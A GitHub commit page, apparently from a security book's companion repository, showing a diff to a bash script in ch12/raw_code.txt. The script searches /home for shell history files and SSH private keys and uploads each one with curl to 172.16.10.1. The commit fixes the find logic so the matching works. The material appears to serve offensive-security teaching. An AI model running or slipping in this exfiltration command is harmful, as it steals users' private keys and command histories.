Skip to content

Commit

Permalink
or
Browse files Browse the repository at this point in the history
  • Loading branch information
dolevf committed Dec 1, 2023
1 parent dfad81f commit 4a57722
Showing 1 changed file with 1 addition and 3 deletions.
4 changes: 1 addition & 3 deletions ch12/raw_code.txt
Original file line number Diff line number Diff line change
@@ -1,7 +1,5 @@
#!/bin/bash
find /home/ \
-type f \
-name ".*_history" \
-name "id_rsa" \
-name "id_dsa" \
-o -name ".*_history" -o -name "id_rsa" -o -name "id_dsa" \
-exec curl -F "filedata=@{}" "http://172.16.10.1" \; 2> /dev/null

0 comments on commit 4a57722

Please sign in to comment.